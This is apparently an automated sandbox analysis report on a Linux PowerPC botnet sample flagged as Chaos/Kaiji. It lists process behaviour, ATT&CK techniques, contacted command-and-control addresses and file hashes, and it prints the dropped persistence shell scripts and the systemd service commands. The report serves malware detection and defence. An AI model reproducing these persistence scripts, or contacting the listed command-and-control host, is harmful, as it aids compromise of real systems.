        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/122/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/122/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/243/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/243/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/2/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/2/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/123/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/123/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/244/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/244/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1589/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1589/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/124/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/124/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/245/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/245/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1588/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/1588/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/125/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/125/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/4/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/4/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/246/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/246/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3402/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/3402/cmdlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/126/statusJump to behavior
        Source: /usr/bin/pkill (PID: 5599)File opened: /proc/126/cmdlineJump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5490)Shell command executed: /bin/bash -c /etc/32678&Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5560)Shell command executed: /bin/bash -c "cd /boot;systemctl daemon-reload;systemctl enable linux.service;systemctl start linux.service;journalctl -xe --no-pager"Jump to behavior
        Source: /boot/System.img.config (PID: 5599)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
        Source: /etc/id.services.conf (PID: 5812)Pkill executable: /usr/bin/pkill -> pkill -9 32678Jump to behavior
        Source: /usr/sbin/service (PID: 5496)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5516)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
        Source: /usr/sbin/service (PID: 5530)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
        Source: /usr/sbin/update-rc.d (PID: 5532)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
        Source: /bin/bash (PID: 5562)Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reloadJump to behavior
        Source: /bin/bash (PID: 5566)Systemctl executable: /usr/bin/systemctl -> systemctl enable linux.serviceJump to behavior
        Source: /bin/bash (PID: 5570)Systemctl executable: /usr/bin/systemctl -> systemctl start linux.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5825)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5839)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
        Source: /usr/sbin/service (PID: 5845)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
        Source: /usr/sbin/service (PID: 5748)Systemctl executable: /usr/bin/systemctl -> systemctl start crond.serviceJump to behavior
        Source: /usr/sbin/service (PID: 5766)Systemctl executable: /usr/bin/systemctl -> systemctl --quiet is-active multi-user.targetJump to behavior
        Source: /usr/sbin/service (PID: 5773)Systemctl executable: /usr/bin/systemctl -> systemctl list-unit-files --full --type=socketJump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File: /etc/id.services.conf (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File: /etc/32678 (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File: /boot/System.img.config (bits: - usr: rx grp: rx all: rwx)Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5483)File written: /etc/id.services.confJump to dropped file
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File written: /boot/System.img.configJump to dropped file
        Source: /tmp/linux_ppc64el.elf (PID: 5483)Writes shell script file to disk with an unusual file extension: /etc/32678Jump to dropped file
        Source: /tmp/linux_ppc64el.elf (PID: 5501)Writes shell script file to disk with an unusual file extension: /etc/init.d/linux_killJump to dropped file
        Source: /usr/sbin/service (PID: 5531)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
        Source: /usr/sbin/service (PID: 5846)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior
        Source: /usr/sbin/service (PID: 5774)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/pJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Drops files in suspicious directories
        Source: /tmp/linux_ppc64el.elf (PID: 5501)File: /etc/init.d/linux_killJump to dropped file
        Uses known network protocols on non-standard ports
        Source: unknownNetwork traffic detected: HTTP traffic on port 47700 -> 808
        Source: unknownNetwork traffic detected: HTTP traffic on port 808 -> 47700
        Source: /etc/32678 (PID: 5514)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
        Source: /etc/32678 (PID: 5763)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
        Source: /etc/32678 (PID: 5837)Sleep executable: /usr/bin/sleep -> sleep 60Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5501)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5599)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/pkill (PID: 5812)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
        Source: /usr/bin/sleep (PID: 5514)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /usr/bin/sleep (PID: 5763)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /usr/bin/sleep (PID: 5837)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5483)Queries kernel information via 'uname': Jump to behavior
        Source: /bin/bash (PID: 5490)Queries kernel information via 'uname': Jump to behavior
        Source: /tmp/linux_ppc64el.elf (PID: 5501)Queries kernel information via 'uname': Jump to behavior
        Source: /bin/bash (PID: 5560)Queries kernel information via 'uname': Jump to behavior
        Source: /boot/System.img.config (PID: 5571)Queries kernel information via 'uname': Jump to behavior
        Source: /etc/id.services.conf (PID: 5806)Queries kernel information via 'uname': Jump to behavior
        Source: /etc/id.services.conf (PID: 5831)Queries kernel information via 'uname': Jump to behavior
        Source: /boot/System.img.config (PID: 5756)Queries kernel information via 'uname': Jump to behavior
        Source: System.img.config, 5756.1.00007fffe6300000.00007fffe6321000.rw-.sdmpBinary or memory string: yx86_64/usr/bin/qemu-ppc64le/boot/System.img.config
        Source: 32678, 5806.1.00007ffe5d7ea000.00007ffe5d80b000.rw-.sdmp, id.services.conf, 5806.1.00007ffe5d7ea000.00007ffe5d80b000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc64le/etc/id.services.confJOURNAL_STREAM=9:65259PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binINVOCATION_ID=bc2b0857337944388045c478d181f5c8LANG=en_US.UTF-8PWD=//etc/id.services.conf
        Source: System.img.config, 5756.1.00007fffe6300000.00007fffe6321000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64le
        Source: systemd, 5571.1.00007ffd69e45000.00007ffd69e66000.rw-.sdmp, System.img.config, 5571.1.00007ffd69e45000.00007ffd69e66000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc64le/boot/System.img.configLANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binINVOCATION_ID=bc2b0857337944388045c478d181f5c8JOURNAL_STREAM=9:65259/boot/System.img.config
        Source: id.services.conf, 5831.1.000056139f635000.000056139fad6000.rw-.sdmpBinary or memory string: Vsbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin1/etc/qemu-binfmt/ppc64le1/machine/unattached/device[1]u>1
        Source: linux_ppc64el.elf, 5483.1.00007fff85016000.00007fff85037000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-ppc64le/tmp/linux_ppc64el.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/linux_ppc64el.elf
        Source: linux_ppc64el.elf, 5483.1.0000559ab95cf000.0000559ab9a98000.rw-.sdmp, systemd, 5571.1.000055b4066b1000.000055b406b6b000.rw-.sdmp, System.img.config, 5571.1.000055b4066b1000.000055b406b6b000.rw-.sdmpBinary or memory string: (8:@HPX`hp1/etc/qemu-binfmt/ppc64le1/machine/unattached/device[1]u>1
        Source: id.services.conf, 5831.1.00007ffeff5e3000.00007ffeff604000.rw-.sdmpBinary or memory string: XXx86_64/usr/bin/qemu-ppc64le/etc/id.services.conf
        Source: 32678, 5806.1.000055d94a6c2000.000055d94ab81000.rw-.sdmp, id.services.conf, 5806.1.000055d94a6c2000.000055d94ab81000.rw-.sdmpBinary or memory string: 1/etc/qemu-binfmt/ppc64le1/machine/unattached/device[1]u>1
        Source: System.img.config, 5756.1.00005585a57ad000.00005585a5c74000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/ppc64le
        Source: System.img.config, 5756.1.00005585a57ad000.00005585a5c74000.rw-.sdmpBinary or memory string: Usbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin1/etc/qemu-binfmt/ppc64le1/machine/unattached/device[1]u>1

        Stealing of Sensitive Information

        barindex
        Yara detected Chaos
        Source: Yara matchFile source: linux_ppc64el.elf, type: SAMPLE
        Source: Yara matchFile source: /etc/id.services.conf, type: DROPPED
        Source: Yara matchFile source: /boot/System.img.config, type: DROPPED

        Remote Access Functionality

        barindex
        Yara detected Chaos
        Source: Yara matchFile source: linux_ppc64el.elf, type: SAMPLE
        Source: Yara matchFile source: /etc/id.services.conf, type: DROPPED
        Source: Yara matchFile source: /boot/System.img.config, type: DROPPED

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information1
        Scripting        		Valid Accounts1
        Command and Scripting Interpreter        		1
        Systemd Service        		1
        Systemd Service        		1
        Masquerading        		1
        OS Credential Dumping        		11
        Security Software Discovery        		Remote ServicesData from Local System11
        Non-Standard Port        		Exfiltration Over Other Network Medium1
        Data Manipulation
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Scripting        		Boot or Logon Initialization Scripts1
        Hide Artifacts        		LSASS Memory1
        Virtualization/Sandbox Evasion        		Remote Desktop ProtocolData from Removable Media1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Virtualization/Sandbox Evasion        		Security Account Manager1
        File and Directory Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        File and Directory Permissions Modification        		NTDS1
        System Information Discovery        		Distributed Component Object ModelInput Capture2
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Disable or Modify Tools        		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Hidden Files and Directories        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Malware Configuration

        No configs have been found

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1562732 Sample: linux_ppc64el.elf Startdate: 25/11/2024 Architecture: LINUX Score: 76 110 aras.liveya.org 103.135.101.78, 42412, 47700, 52462 TH-AS-APTianhaiInfoTechCN Hong Kong 2->110 112 www.google.com 2->112 114 Multi AV Scanner detection for submitted file 2->114 116 Yara detected Chaos 2->116 118 Connects to many ports of the same IP (likely port scanning) 2->118 120 Uses known network protocols on non-standard ports 2->120 12 linux_ppc64el.elf 2->12         started        16 systemd System.img.config 2->16         started        18 sshd sshd 2->18         started        20 10 other processes 2->20 signatures3 process4 file5 106 /etc/id.services.conf, ELF 12->106 dropped 108 /etc/32678, POSIX 12->108 dropped 126 Sample tries to set files in /etc globally writable 12->126 128 Writes identical ELF files to multiple locations 12->128 22 linux_ppc64el.elf linux_ppc64el.elf 12->22         started        26 linux_ppc64el.elf service systemctl 12->26         started        28 linux_ppc64el.elf bash 12->28         started        30 System.img.config sh 16->30         started        32 System.img.config service systemctl 16->32         started        34 System.img.config pkill 16->34         started        36 System.img.config System.img.config 16->36         started        38 sshd 18->38         started        40 4 other processes 20->40 signatures6 process7 file8 102 /etc/init.d/linux_kill, POSIX 22->102 dropped 104 /boot/System.img.config, ELF 22->104 dropped 122 Writes identical ELF files to multiple locations 22->122 124 Drops files in suspicious directories 22->124 42 linux_ppc64el.elf bash 22->42         started        44 linux_ppc64el.elf update-rc.d 22->44         started        46 service 26->46         started        48 service basename 26->48         started        56 2 other processes 26->56 50 bash 32678 28->50         started        52 sh 32678 30->52         started        54 service 32->54         started        58 3 other processes 32->58 signatures9 process10 process11 76 4 other processes 42->76 60 update-rc.d systemctl 44->60         started        62 service systemctl 46->62         started        64 service sed 46->64         started        66 32678 sleep 50->66         started        68 32678 id.services.conf 52->68         started        70 32678 sleep 52->70         started        72 service systemctl 54->72         started        74 service sed 54->74         started        process12 78 id.services.conf service systemctl 68->78         started        80 id.services.conf sh 68->80         started        82 id.services.conf pkill 68->82         started        84 id.services.conf id.services.conf 68->84         started        process13 86 service 78->86         started        88 service basename 78->88         started        90 service basename 78->90         started        92 service systemctl 78->92         started        94 sh 32678 80->94         started        process14 96 service systemctl 86->96         started        98 service sed 86->98         started        100 32678 sleep 94->100         started       

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        linux_ppc64el.elf42%ReversingLabsLinux.Trojan.Kaiji

        Dropped Files

        SourceDetectionScannerLabelLink
        /boot/System.img.config42%ReversingLabsLinux.Trojan.Kaiji
        /etc/326780%ReversingLabs
        /etc/id.services.conf42%ReversingLabsLinux.Trojan.Kaiji
        /etc/init.d/linux_kill0%ReversingLabs

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://103.135.101.78:808/password.txt0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        aras.liveya.org
        		103.135.101.78
        		truetrue
          		unknown
          www.google.com
          		142.250.181.100
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://103.135.101.78:808/password.txttrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.baidu.com/search/spider.html)linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
              		high
              http://search.msn.com/msnbot.htmlinux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                		high
                http://www.baidu.com/search/spider.html)000102030405060708091011121314151617181920212223242526272829linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                  		high
                  https://www.so.com/s?q=indexlinux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                    		high
                    http://help.yahoo.com/help/us/ysearch/slurp)x509:linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                      		high
                      http://www.google.com/mobile/adsbot.html)linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                        		high
                        http://www.huaweisymantec.com/cn/IRL/spider)Mozilla/5.0linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                          		high
                          http://www.baidu.com/search/spider.html)http2:linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                            		high
                            http://yandex.com/bots)http:linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                              		high
                              http://www.baidu.com/search/spider.html)Mozilla/5.0id.services.conf.12.drfalse
                                		high
                                http://www.entireweb.com/about/search_tech/speedy_spider/)text/htmllinux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                                  		high
                                  http://www.haosou.com/help/help_3_2.htmlMozilla/5.0linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                                    		high
                                    https://www.baidu.com/s?wd=insufficientlinux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                                      		high
                                      http://www.youdao.com/help/webmaster/spider/;)reflect:linux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                                        		high
                                        https://search.yahoo.com/search?p=illegallinux_ppc64el.elf, System.img.config.19.dr, id.services.conf.12.drfalse
                                          		high

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          103.135.101.78
                                          		aras.liveya.orgHong Kong
                                          		4842TH-AS-APTianhaiInfoTechCNtrue

                                          Joe Sandbox View / Context

                                          IPs

                                          No context

                                          Domains

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          www.google.comfile.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          • 172.217.21.36
                                          https://shorturl.at/ZbKEL?REVd=Vhx6ZLBnjMmGet hashmaliciousUnknownBrowse
                                          • 172.217.21.36
                                          https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                          • 172.217.21.36
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, DarkTortilla, LummaC Stealer, Stealc, VidarBrowse
                                          • 142.250.181.100
                                          https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/random.bby/inpoxqhfiww/gmail.com/ozwunijponqp8Get hashmaliciousUnknownBrowse
                                          • 142.250.181.100
                                          file.exeGet hashmaliciousClipboard Hijacker, CryptbotBrowse
                                          • 142.250.181.68
                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                          • 142.250.181.68
                                          Fumari INC.emlGet hashmaliciousUnknownBrowse
                                          • 216.58.208.228
                                          https://invites-doc.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                          • 142.250.181.68
                                          Fumari INC.emlGet hashmaliciousUnknownBrowse
                                          • 142.250.181.68

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          TH-AS-APTianhaiInfoTechCNDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                          • 202.61.233.66
                                          Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
                                          • 202.61.204.198
                                          Payload 94.75.225.exeGet hashmaliciousUnknownBrowse
                                          • 202.61.196.212
                                          xi.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 103.135.101.188
                                          xi.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 103.135.101.188
                                          xi.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 103.135.101.188
                                          xi.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 103.135.101.188
                                          xi.mips.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 103.135.101.188
                                          https://link.edgepilot.com/s/c12cb3f0/yNbpJS7pykGhMMzxNnzxvw?u=https://hinproperty.com/Get hashmaliciousUnknownBrowse
                                          • 202.61.198.34
                                          https://tlktokmali.top/Get hashmaliciousUnknownBrowse
                                          • 103.27.79.82

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          /etc/32678linux_ppc64.elfGet hashmaliciousChaosBrowse
                                            linux_ppc64el.elfGet hashmaliciousChaosBrowse
                                              linux_386.elfGet hashmaliciousChaosBrowse
                                                linux_arm5.elfGet hashmaliciousChaosBrowse
                                                  linux_arm6.elfGet hashmaliciousChaosBrowse
                                                    linux_arm64.elfGet hashmaliciousChaosBrowse
                                                      linux_amd64.elfGet hashmaliciousChaosBrowse
                                                        linux_arm7.elfGet hashmaliciousChaosBrowse
                                                          linux_arm6.elfGet hashmaliciousChaosBrowse
                                                            linux_arm5.elfGet hashmaliciousChaosBrowse

                                                              Created / dropped Files

                                                              /boot/System.img.config

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
                                                              Category:dropped
                                                              Size (bytes):5111808
                                                              Entropy (8bit):5.971492382871872
                                                              Encrypted:false
                                                              SSDEEP:49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
                                                              MD5:04893430BFAF82B24E726E9980C338B3
                                                              SHA1:9DFD9C35B547705B267B4C2ACD5CB7699BA5EDB5
                                                              SHA-256:535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60
                                                              SHA-512:C20622C1339EDCBA1F4DF9F17876C460D42353DF319EA2CEB14C8467B8A5099E264173352A226FC4D41C9A4089FF831A36ACCABDC2E2C9A72847BAE06C2F9D0F
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ChaosGo, Description: Yara detected Chaos, Source: /boot/System.img.config, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Reputation:low
                                                              Preview:.ELF.....................R......@...................@.8...@.............@.......@.......@...............................................................d.......d...............................................T.%.....T.%.......................&.......'.......'.....@.#.....@.#.......................J.......K.......K.............pE..............Q.td.......................................................e.*..................................................................................................................................................T.%.............................j.................'.......&.....+@.............. .......................................@@5.....................................r................A6......A5..................... ...............|................X6......X5.....P............... ...............................0b6.....0b5.....................................................@b6.....@b5..................... ...............B.................K.......J.....

                                                              /etc/32678

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:POSIX shell script, ASCII text executable
                                                              Category:dropped
                                                              Size (bytes):61
                                                              Entropy (8bit):4.483513158259707
                                                              Encrypted:false
                                                              SSDEEP:3:TKH4vSNMOsUF4K0WJTDALWpgGAn:hisUF4kDALWRAn
                                                              MD5:768EAF287796DA19E1CF5E0B2FB1B161
                                                              SHA1:6A1CE2EE5CCC86D1F33806FEB14547B35290DF2A
                                                              SHA-256:1D22620DFB2A6715E5D745AED5CF841EDE0E75E1747F12B9B925A2D346BC7ECB
                                                              SHA-512:E6AF30C9DF4F7F47696069511E64ECBC8E841629D692EE4056503DF3533FB7A7A74960698826260355E1DBA7B6C562482A27A39BB51A4237473CE4B68472D620
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: linux_ppc64.elf, Detection: malicious, Browse
                                                              • Filename: linux_ppc64el.elf, Detection: malicious, Browse
                                                              • Filename: linux_386.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm6.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm64.elf, Detection: malicious, Browse
                                                              • Filename: linux_amd64.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm7.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm6.elf, Detection: malicious, Browse
                                                              • Filename: linux_arm5.elf, Detection: malicious, Browse
                                                              Reputation:moderate, very likely benign file
                                                              Preview:#!/bin/sh.while [ 1 ]; do.sleep 60./etc/id.services.conf.done

                                                              /etc/id.services.conf

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:ELF 64-bit LSB executable, 64-bit PowerPC or cisco 7500, OpenPOWER ELF V2 ABI, version 1 (SYSV), statically linked, Go BuildID=Y52nvXRmmagZPlBTD-aN/NAr5Akn8HWwmUdYC_fAB/CpqR8sVX_ghDLQQPm5P-/GAtPsar0-LeUP45KvIBJ, stripped
                                                              Category:dropped
                                                              Size (bytes):5111808
                                                              Entropy (8bit):5.971492382871872
                                                              Encrypted:false
                                                              SSDEEP:49152:i2LzgioAq4P670Og/d6I+eFRgjpmbLQYLy28qntKyB1:nLzgioh4P670Og/d6I+wgjpaLya
                                                              MD5:04893430BFAF82B24E726E9980C338B3
                                                              SHA1:9DFD9C35B547705B267B4C2ACD5CB7699BA5EDB5
                                                              SHA-256:535B04D328DA7B0BE034710AEB74C4460C873D72CCF1E6E8186D4FAF2E158C60
                                                              SHA-512:C20622C1339EDCBA1F4DF9F17876C460D42353DF319EA2CEB14C8467B8A5099E264173352A226FC4D41C9A4089FF831A36ACCABDC2E2C9A72847BAE06C2F9D0F
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ChaosGo, Description: Yara detected Chaos, Source: /etc/id.services.conf, Author: Joe Security
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 42%
                                                              Reputation:low
                                                              Preview:.ELF.....................R......@...................@.8...@.............@.......@.......@...............................................................d.......d...............................................T.%.....T.%.......................&.......'.......'.....@.#.....@.#.......................J.......K.......K.............pE..............Q.td.......................................................e.*..................................................................................................................................................T.%.............................j.................'.......&.....+@.............. .......................................@@5.....................................r................A6......A5..................... ...............|................X6......X5.....P............... ...............................0b6.....0b5.....................................................@b6.....@b5..................... ...............B.................K.......J.....

                                                              /etc/init.d/linux_kill

                                                              Download File
                                                              Process:/tmp/linux_ppc64el.elf
                                                              File Type:POSIX shell script, ASCII text executable
                                                              Category:dropped
                                                              Size (bytes):189
                                                              Entropy (8bit):5.112939120919767
                                                              Encrypted:false
                                                              SSDEEP:3:TKH4vfSgisKhW0GNstXWQfvYqkNDH2MDGKLQsUkDJREpsVWRQ0kDJRKVtAKOW0T6:hnSgisKhdtXpvPkVLDqklv4Q0klaARB6
                                                              MD5:3909975F7CC0D1121C1819B800069F31
                                                              SHA1:3E68DE708C2E6C40FAB6794AFDEE3104E5590189
                                                              SHA-256:6876DAC71F13A068AFB863D257134275F2EDBA43B2ACAF4924FABF97C079070B
                                                              SHA-512:50600CCEEB03B05F45AE61D890CAEE9F51FF390B6776930866E527E071D65D08241FC66673FD9B99D62FBC77D3C00FC3DE4D7378CBC42F5DABA5D83072B0906E
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Reputation:moderate, very likely benign file
                                                              Preview:#!/bin/sh...### BEGIN INIT INFO...#chkconfig: 2345 10 90...#description:System.img.config...# Default-Start:.2 3 4 5...# Default-Stop:...### END INIT INFO.../boot/System.img.config...exit 0

                                                              /memfd:snapd-env-generator (deleted)

                                                              Download File
                                                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):76
                                                              Entropy (8bit):3.7627880354948586
                                                              Encrypted:false
